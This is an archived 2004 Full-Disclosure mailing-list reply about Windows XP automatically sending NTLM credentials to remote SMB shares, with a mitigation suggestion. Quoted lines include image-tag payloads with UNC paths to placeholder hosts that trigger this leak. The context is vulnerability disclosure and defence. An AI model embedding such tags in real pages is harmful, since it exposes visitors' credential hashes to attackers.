lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <2310581523.20040929105242@SECURITY.NNOV.RU>
Date: Wed, 29 Sep 2004 10:52:42 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: "Hidenobu Seki" <urity_friday@...mail.com>
Cc: full-disclosure@...ts.netsys.com, Secure@...rosoft.com,
   bugtraq@...urityfocus.com
Subject: Re[2]: Automatically passing NTLM authentication credentials on Windows XP


Dear Hidenobu Seki,

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

I  have  same  question.  I  had discussion on this topic with Microsoft
security  team  again  just few weeks ago (and 2 more discussions during
last  4  years).  They accepted this problem and have re-opened the case
(MSRC  5468lw)  but  gave  no timelines for solution. I think MS doesn't
understand  problem  completely.  For  example,  they  still believe SMB
signing prevents NTLM relaying attacks while SMB signing doesn't prevent
even  simplest  port  redirection,  because  IP  address  is not signed.

Currently  there  is  no  way  to mitigate this problem except filtering
outgoing  NetBIOS  and  CIFS  requests  by  implementing  domain wide IP
Security  policy  to  allow  SMB  and  CIFS communication only with file
servers/domain  controllers  (if  somebody  is  interested I can publish
step-by-step instructions, but I believe MS should publish KB article to
describe this configuration).

I  don't  think  problem  reported  by you is different issue, it's just
another exploit scenario for the same problem. I know few more tricks to
redirect user to UNC share.

--Wednesday, September 29, 2004, 5:43:15 AM, you wrote to 3APA3A@...URITY.NNOV.RU:

>>From: 3APA3A <3APA3A@...URITY.NNOV.RU>
>>
>>This  problem  is  known  since at least 1997 and still can be exploited
>>with   <IMG  SRC="\\w.x.y.z\fakeshare\fakefile">  without  any  MS  Word
>>document.

HS> It is not true.
HS> They are different problems that happen the same phenomenon.

HS> Mr. Cesar Cerrudo taught me that <img
HS> src=file://\\www.xxx.yyy\test> still 
HS> works.

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and 
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

HS> Kind regards,
HS> Urity

HS> _________________________________________________________________
HS> STOP MORE SPAM with the new MSN 8 and get 2 months FREE* 
HS> http://join.msn.com/?page=features/junkmail



-- 
~/ZARAZA
Появился новый тип элементарных частиц - шкварки.
Не очень большие, слегка подгоревшие.  (Лем)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ